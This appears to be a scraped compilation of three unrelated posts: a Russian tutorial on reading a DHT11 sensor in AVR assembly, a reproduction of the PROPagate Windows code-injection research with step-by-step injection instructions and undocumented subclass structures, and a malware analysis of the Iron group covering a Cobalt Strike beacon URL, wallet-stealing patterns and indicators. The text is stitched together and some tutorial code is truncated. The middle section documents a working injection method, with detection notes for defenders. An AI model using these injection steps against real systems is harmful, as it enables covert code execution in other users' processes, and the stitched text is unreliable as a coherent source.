				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; порт D, Пин 2 на выход

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; выставили 0 

				RCALL DELAY_20MS		; ждем 20 миллисекунд

				LDI Tmp1, (1<<DHT_Pin)		; освободили линию - выставили 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; ждем 10 микросекунд

				LDI Tmp1, (0<<DHT_Direction_Pin)		; порт D, Pin 2 на вход
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; подтянули pull-up вход на вместе с внешним резистором на линии
				OUT DHT_Port, Tmp1		

; ждем ответа от сенсора - он должен положить линию в ноль на 80 us и отпустить на 80 us

Смотрим анализатором — а ответил ли датчик?

Да, ответ есть — вот те сигналы после нашего первого импульса в 20 милсек — это и есть ответ датчика. Для просмотра посылки я использовал китайский клон USBEE AX Pro который подключен к сигнальному проводу датчика.

Растянем масштаб так чтобы увидеть окончание нашего импульса в 20 милсек и лучше увидеть начало посылки от датчика — смотрим все как в datasheet — сначала датчик выставил низкий/высокий уровень по 80 мксек, потом начал передавать биты — а данном случае во втором «полубите» передается «0»

Значит датчик работает и данные нам прислал, теперь надо эти данные правильно прочитать. Поскольку задача у нас учебная, то и решать ее будем тупо в лоб. В момент ответа датчика, т.е. в момент перехода с высокого уровня в низкий, мы запустим цикл с счетчиком числа повторов нашего цикла. Внутри цикла, будем постоянно следить за уровнем сигнала на ноге. Итого, в цикле будем ждать, когда сигнал на ноге перейдет обратно на высокий уровень — тем самым определив длительность сигнала первого «полубита». Наш микроконтроллер работает на частоте 16 MHz и за период например в 50 микросекунд контроллер успеет выполнить около 800 инструкций. Когда на линии появится высокий уровень — то мы из цикла аккуратно выходим, а число повторов цикла, которые мы отсчитали с использованием счетчика — запоминаем в переменную.

После перехода сигнальной линии уже на высокий уровень мы делаем такую же операцию– считаем циклы, до момента когда датчик начнет передавать следующий бит и положит линию в низкий уровень. К счастью, нам не надо знать точный временной интервал наших импульсов, нам достаточно понимать, что один интервал больше другого. Понятно, что если датчик передает бит «ноль» то длительность второго «полубита» и соответственно число циклов, которые мы отсчитали будет меньше чем длительность первого «полубита». Если же датчик передал бит «единица», то число циклов которые мы насчитаем во время второго полубита будет больше чем в первым.

И для того что бы мы не висели вечно, если вдруг датчик не ответил или засбоил, сам цикл мы будем запускать на какой-то временной период, но который гарантированно больше самой длинной посылки, чтоб если датчик не ответил, то мы смогли выйти по тайм-ауту.

В данном случае показан пример для ситуации, когда у нас на линии был ноль, и мы считаем сколько раз мы в цикле мы считали состояние ноги контроллера, пока датчик не переключил линию в единицу.

;=============	EXPECT 1 =========================================
; крутимся в цикле ждем нужного состояния на пине
; когда появилось - выходим
; сообщаем сколько циклов ждали
; или сообщение об ошибке тайм оута если не дождались
EXPECT_1:		LDI Cycle_Count, 0			; загрузили счетчик циклов
			LDI ERR_CODE, 2			; Ошибка 2 - выход по тайм Out

			ldi  Tmp1, 2			; Загрузили 
			ldi  Tmp2, 169			; задержку 80 us

EXP1L1:			INC Cycle_Count			; увеличили счетчик циклов

			IN Tmp3, DHT_InPort		; читаем порт
			SBRC Tmp3, DHT_Pin	; Если 1 
			RJMP EXIT_EXPECT_1	; То выходим
			dec  Tmp2			; если нет то крутимся в задержке
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; Здесь выход по тайм out

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; ошибка 1, все нормально, в Cycle_Count счетчик циклов

Аналогичная подпрограмма используется для того, чтобы посчитать сколько циклов у нас должно прокрутиться, пока датчик из состояния ноль на линии переложил линию в состояние единицы.

Для расчета временных задержек мы будет использовать тот же подход, который мы использовали при мигании светодиодом — подберем параметры пустого цикла для формирования нужной паузы. Я использовал специальный калькулятор. При желании можно посчитать число рабочих инструкций и вручную.

Памяти в нашем контроллере довольно много — аж 2 (Два) килобайта, так что мы не будем жлобствовать с памятью, и тупо сохраним данные счетчиков относительно наших 80 ( 40 бит, 2 интервала на бит) интервалов в память.

Объявим переменную

CYCLES: .byte 80 ; буфер для хранения числа циклов

И сохраним все считанные циклы в память.

;============== READ CYCLES ====================================
; читаем биты контроллера и сохраняем в Cycles 
READ_CYCLES:	LDI N_Cycles, 80			; читаем 80 циклов
		RCALL EXPECT_1				; Открутился 0
		ST X+, Cycles_Counter			; Сохранили число циклов 
		ST X+, Cycles_Counter			; Сохранили число циклов 
		DEC N_Cycles				; уменьшили счетчик
		BRNE READ					
		RET					; все циклы считали

Теперь, для отладки, попробуем посмотреть насколько удачно посчиталось длительность интервалов и понять действительно ли мы считали данные из датчика. Понятно, что число отсчитанных циклов первого «полубита» должно быть примерно одинаково у всех битовых посылок, а вот число циклов при отсчете второго «полубита» будет или существенно меньше, или наоборот существенно больше.

Для того чтобы передавать данные в большой компьютер будем использовать USART контроллера, который через USB кабель будет передавать данные в программу — терминал, например PuTTY. Передаем опять же тупо в лоб — засовываем байт в нужный регистр управления USART-а и ждем, когда он передастся. Для удобства я также использовал пару подпрограмм, типа — передать несколько байт, начиная с адреса в Y, ну и перевести каретку в терминале для красоты.

;============	SEND 1 BYTE VIA USART =====================
		SBRS Tmp1, UDRE0			; если регистр данных пустой
		STS UDR0, USART_ByteR		; то шлем байт из R17

;============	SEND CRLF VIA USART ===============================
		LDI USART_ByteR, $0A

;============	SEND N BYTES VIA USART ============================
; Y - что слать, USART_BytesN - сколько байт

Отправив в терминал число отсчётов для 80 интервалов, можно попробовать собрать собственно значащие биты. Делать будем как написано в учебнике, т.е. в datasheet — попарно сравним число циклов первого «полубита» с числом циклов второго. Если вторые пол-бита короче — значит это закодировать ноль, если длиннее — то единица. После сравнения биты накапливаем в аккумуляторе и сохраняем в память по-байтово начиная с адреса BITS.

;=============	GET BITS ===============================================
; Из Cycles делаем байты в  BITS				
GET_BITS:			LDI Tmp1, 5			; для пяти байт - готовим счетчики
				LDI Tmp2, 8			; для каждого бита
				LDI ZH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI ZL, Low (CYCLES)	; загрузили младший байт адреса Cycles
				LDI YH, High(BITS)	; загрузили старший байт адреса BITS
				LDI YL, Low (BITS)	; загрузили младший байт адреса BITS

ACC:				LDI ACCUM, 0			; акамулятор инициализировали
				LDI Tmp2, 8			; для каждого бита

TO_ACC:				LSL ACCUM				; сдвинули влево
				LD Tmp3, Z+			; считали данные [i]
				LD Tmp4, Z+			; о циклах и [i+1]
				CP Tmp3, Tmp4			; сравнить первые пол бита с второй половину бита если положительно - то BITS=0, если отрицительно то BITS=1
				BRPL J_SHIFT		; если положительно (0) то просто сдвиг	
				ORI ACCUM, 1			; если отрицательно (1) то добавили 1
J_SHIFT:			DEC Tmp2				; повторить для 8 бит
				ST Y+, ACCUM			; сохранили акамулятор
				DEC Tmp1				; для пяти байт

Итак, здесь мы собрали в памяти начиная с метки BITS те пять байт, которые передал контроллер. Но работать с ними в таком формате не очень неудобно, поскольку в памяти это выглядит примерно, как:
34002100ХХ, где 34 — это влажность целая часть, 00 — данные после запятой влажности, 21 — температура, 00 — опять данные после запятой температуры, ХХ — контрольная сумма. А нам надо бы вывести в терминал красиво типа «Temperature = 21.00». Так что для удобства, растащим данные по отдельным переменным.


H10:			.byte 1		; чиcло - целая часть влажность
H01:			.byte 1		; число - дробная часть влажность
T10:			.byte 1		; число - целая часть температура в C
T01:			.byte 1		; число - дробная часть температура

И сохраняем байты из BITS в нужные переменные

;============	GET HnT DATA =========================================
; из BITS вытаскиваем цифры H10...
; !!! чуть хакнули, потому что H10 и дальше... лежат последовательно в памяти


				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - перевести на счетчик таки
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили


После этого преобразуем цифры в коды ASCII, чтобы данные можно было нормально прочитать в терминале, добавляем названия данных, ну там «температура» из флеша и шлем в COM порт в терминал.

PuTTY с данными

Для того, чтобы это измерять температуру регулярно добавляем вечный цикл с задержкой порядка 1200 миллисекунд, поскольку datasheet DHT11 говорит, что не рекомендуется опрашивать датчик чаще чем 1 раз в секунду.

Основной цикл после этого выглядит примерно так:

;============	MAIN
			;!!! Главный вход

			; Internal Hardware Init
			CLI		; нам прерывания не нужны пока
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1


			; Init data
			RCALL COPY_STRINGS		; скопировали данные в RAM
			RCALL TEST_DATA			; подготовили тестовые данные

loop:				NOP						; крутимся в вечном цикле ....
				; External Hardware Init
				; получили здесь подтверждение контроллера и надо в темпе читать биты
				; критичная ко времени секция завершилась...
				;Тест - отправить Cycles в USART		
				; получаем из посылки биты
				;Тест - отправить BITS в USART
				; получаем из BITS цифровые данные
				;Тест - отправить 4 байта начиная с H10 в USART
				;RCALL TEST_H10_T01
				; подготовидли температуру и влажность в ASCII		
				; Отправить готовую температуру (надпись и ASCII данные) в USART
				; Отправить готовую влажность (надпись и ASCII данные) в USART
				; переведем строку дял красоты				
				RCALL DELAY_1200MS				;повторяем каждые 1.2 секунды 
				rjmp loop		; зациклились

Прошиваем, подключаем USB-TTL кабель (преобразователь)к компьютеру, запускаем терминал, выбираем правильный виртуальный COM порта и наслаждаемся нашим новым цифровым термометром. Для проверки можно погреть датчик в руке — у меня температура при этом растет, а влажность как ни странно уменьшается.

Ссылки по теме:
AVR Delay Calc
Как подключить Arduino для программирования в Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Код примера на github

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.


PROPagate — a new code injection trick


Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:

If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.


This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes



PROPagate follow-up — Some more Shattering Attack Potentials


We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.


A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂


There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.



PROPagate follow-up #2 — Some more Shattering Attack Potentials


A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:


In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.



No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.


The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.


  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe


  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW


This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

Iron Group’s Malware using HackingTeam’s Leaked RCS source code with VMProtected Installer — Technical Analysis

In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code. We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.

During the past year and a half, the Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

In this technical blog post we are going to take a look at the malware samples found during the research.

Technical Analysis:


** This installer sample (and in general most of the samples found) is protected with VMProtect then compressed using UPX.

Installation process:

1. Check if the binary is executed on a VM, if so – ExitProcess

2. Drop & Install malicious chrome extension
3. Extract malicious chrome extension to %localappdata%\Temp\chrome & create a scheduled task to execute %localappdata%\Temp\chrome\sec.vbs.
4. Create mutex using the CPU’s version to make sure there’s no existing running instance of itself.
5. Drop backdoor dll to %localappdata%\Temp\\<random>.dat.
6. Check OS version:
.If Version == Windows XP then just invoke ‘Launch’ export of Iron Backdoor for a one-time non persistent execution.
.If Version > Windows XP
-Invoke ‘Launch’ export
-Check if Qhioo360 – only if not proceed, Install malicious certificate used to sign Iron Backdoor binary as root CA.Then create a service called ‘helpsvc’ pointing back to Iron Backdoor dll.

Using the leaked HackingTeam source code:

Once we Analyzed the backdoor sample, we immediately noticed it’s partially based on HackingTeam’s source code for their Remote Control System hacking tool, which leaked about 3 years ago. Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam’s source in both IronStealer and Iron ransomware.

1.Anti-VM: Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant leaked source code. This piece of code supports detecting Cuckoo Sandbox, VMWare product & Oracle’s VirtualBox. Screenshot:


2. Dynamic Function Calls: Iron Backdoor is also using the DynamicCall module from HackingTeam’s “core” library. This module is used to dynamically call external library function by obfuscated the function name, which makes static analysis of this malware more complex.
In the following screenshot you can see obfuscated “LFSOFM43/EMM” and “DsfbufGjmfNbqqjohB”, which represents “kernel32.dll” and “CreateFileMappingA” API.

For a full list of obfuscated APIs you can visit obfuscated_calls.h.

Malicious Chrome extension:

A patched version of the popular Adblock Plus chrome extension is used to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.

**patched include.preload.js injects two malicious scripts from the attacker’s Pastebin account.

The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it as you can see in the following screenshot:

Internet Explorer(deprecated):

Iron Backdoor itself embeds adblockplusie – Adblock Plus for IE, which is modified in a similar way to the malicious chrome extension, injecting remote javascript. It seems that this functionality is no longer automatically used for some unknown reason.


Before installing itself as a Windows service, the malware checks for the presence of either 360 Safe Guard or 360 Internet Security by reading following registry keys:


If one of these products is installed, the malware will only run once without persistence. Otherwise, the malware will proceed to installing rouge, hardcoded root CA certificate on the victim’s workstation. This fake root CA supposedly signed the malware’s binaries, which will make them look legitimate.

Comic break: The certificate is protected by the password ‘caonima123’, which means “f*ck your mom” in Mandarin.

IronStealer (<RANDOM>.dat):

Persistent backdoor, dropper and cryptocurrency theft module.

1. Load Cobalt Strike beacon:
The malware automatically decrypts hard coded shellcode stage-1, which in turn loads Cobalt Strike beacon in-memory, using a reflective loader:

Beacon: hxxp://dazqc4f140wtl.cloudfront[.]net/ZZYO

2. Drop & Execute payload: The payload URL is fetched from a hardcoded Pastebin paste address:

We observed two different payloads dropped by the malware:

1. Xagent – A variant of “JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms. JbossMiner is using known database vulnerabilities to spread. “Xagent” is the original filename Xagent<VER>.exe whereas <VER> seems to be the version of the worm. The last version observed was version 6 (Xagent6.exe).

**Xagent versions 4-6 as seen by VT

2. Iron ransomware – We recently saw a shift from dropping Xagent to dropping Iron ransomware. It seems that the wallet & payment portal addresses are identical to the ones that Bart observed. Requested ransom decreased from 0.2 BTC to 0.05 BTC, most likely due to the lack of payment they received.

**Nobody paid so they decreased ransom to 0.05 BTC

3. Stealing cryptocurrency from the victim’s workstation: Iron backdoor would drop the latest voidtool Everything search utility and actually silent install it on the victim’s workstation using msiexec. After installation was completed, Iron Backdoor uses Everything in order to find files that are likely to contain cryptocurrency wallets, by filename patterns in both English and Chinese.

Full list of patterns extracted from sample:
– Wallet.dat
– UTC–
– Etherenum keystore filename
– *bitcoin*.txt
– *比特币*.txt
– “Bitcoin”
– *monero*.txt
– *门罗币*.txt
– “Monroe Coin”
– *litecoin*.txt
– *莱特币*.txt
– “Litecoin”
– *Ethereum*.txt
– *以太币*.txt
– “Ethereum”
– *miner*.txt
– *挖矿*.txt
– “Mining”
– *blockchain*.txt
– *coinbase*

4. Hijack on-going payments in cryptocurrency: IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account:

Pastebin Account:

As part of the investigation, we also tried to figure out what additional information we may learn from the attacker’s Pastebin account:

The account was probably created using the mail fineisgood123@gmail[.]com – the same email address used to register blockbitcoin[.]com (the attacker’s crypto-mining pool & malware host) and swb[.]one (Old server used to host malware & leaked files. replaced by u.cacheoffer[.]tk):

1. Index.html: HTML page referring to a fake Firefox download page.
2. crystal_ext-min + angular: JS inject using malicious Chrome extension.
3. android: This paste holds a command line for an unknown backdoored application to execute on infected Android devices. This command line invokes remote Metasploit stager (android.apk) and drops cpuminer 2.3.2 (minerd.txt) built for ARM processor. Considering the last update date (18/11/17) and the low number of views, we believe this paste is obsolete.

4. androidminer: Holds the cpuminer command line to execute for unknown malicious android applications, at the time of writing this post, this paste received nearly 2000 hits.

Aikapool[.]com is a public mining pool and port 7915 is used for DogeCoin:

The username (myapp2150) was used to register accounts in several forums and on Reddit. These accounts were used to advertise fake “blockchain exploit tool”, which infects the victim’s machine with Cobalt Strike, using a similar VBScript to the one found by Malwrologist (ps5.sct).

XAttacker: Copy of XAttacker PHP remote file upload script.
miner: Holds payload URL, as mentioned above (IronStealer).


How many victims are there?
It is hard to define for sure, , but to our knowledge, the total of the attacker’s pastes received around 14K views, ~11K for dropped payload URL and ~2k for the android miner paste. Based on that, we estimate that the group has successfully infected, a few thousands victims.

Who is Iron group?
We suspect that the person or persons behind the group are Chinese, due in part to the following findings:
. There were several leftover comments in the plugin in Chinese.
. Root CA Certificate password (‘f*ck your mom123’ was in Mandarin)
We also suspect most of the victims are located in China, because of the following findings:
. Searches for wallet file names in Chinese on victims’ workstations.
. Won’t install persistence if Qhioo360(popular Chinese AV) is found



  • blockbitcoin[.]com
  • pool.blockbitcoin[.]com
  • ssl2.blockbitcoin[.]com
  • xmr.enjoytopic[.]tk
  • down.cacheoffer[.]tk
  • dzebppteh32lz.cloudfront[.]net
  • dazqc4f140wtl.cloudfront[.]net
  • androidapt.s3-accelerate.amazonaws[.]com
  • androidapt.s3-accelerate.amazonaws[.]com
  • winapt.s3-accelerate.amazonaws[.]com
  • swb[.]one
  • bitcoinwallet8[.]com
  • blockchaln[.]info
  • 6350a42d423d61eb03a33011b6054fb7793108b7e71aee15c198d3480653d8b7
  • a4faaa0019fb63e55771161e34910971fd8fe88abda0ab7dd1c90cfe5f573a23
  • ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9
  • 654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190
  • 980a39b6b72a7c8e73f4b6d282fae79ce9e7934ee24a88dde2eead0d5f238bda
